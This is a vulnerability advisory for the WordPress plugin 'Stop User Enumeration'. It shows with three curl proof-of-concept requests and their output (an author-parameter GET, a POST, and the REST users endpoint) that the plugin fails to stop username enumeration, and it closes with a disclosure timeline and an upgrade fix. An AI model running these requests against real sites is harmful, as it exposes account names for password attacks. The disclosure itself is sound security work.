CVSS Summary
| Score | 5 Medium |
|---|---|
| Vector | Network |
| Complexity | Low |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | None |
| Availability | None |
Advisory:
Stop User Enumeration does not stop user enumeration
Vulnerability
Last revised:
Traditionally user enumeration of a WordPress site is done by making a series of requests to /?author=1 /?author=2 /?author=3 and so on (a similar effect can be achieved using POST requests too). WordPress 4.7 introduced a REST API endpoint to list all users.
This plugin attempts to prevent requests with an author parameter (but fails), and makes no attempt at preventing requests to the REST API.
Current state: Fixed
Proof of concept
There are three ways to bypass this plugin’s protections.
A GET request:
$ curl -i -s 'http://localhost/?wp-comments-post&author=1' HTTP/1.1 301 Moved Permanently Date: Fri, 23 Dec 2016 15:38:02 GMT Server: Apache/2.4.10 (Debian) X-Powered-By: PHP/7.0.13 Location: http://localhost/author/tomdxw/?wp-comments-post Content-Length: 0 Content-Type: text/html; charset=UTF-8
A POST request:
$ curl -s http://localhost/?wp-comments-post -d author=1 | grep '<title' <title>tomdxw – WP Test</title>
The REST API (new in WordPress 4.7):
$ curl -s http://localhost/wp-json/wp/v2/users
[{"id":1,"name":"tomdxw","url":"","description":"","link":"http:\/\/localhost\/author\/tomdxw\/","slug":"tomdxw","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/localhost\/wp-json\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/localhost\/wp-json\/wp\/v2\/users"}]}}]
Advisory timeline
- 2016-12-23: Discovered
- 2016-12-23: Reported to vendor via info@fullworks.net
- 2016-12-23: Requested CVE
- 2016-12-23: Vendor first replied
- 2017-01-03: Vendor reported issue fixed in version 1.3.5
- 2017-01-04: Advisory published
- 2017-08-23: Received CVE
Mitigation/further actions
Upgrade to version 1.3.5 or later.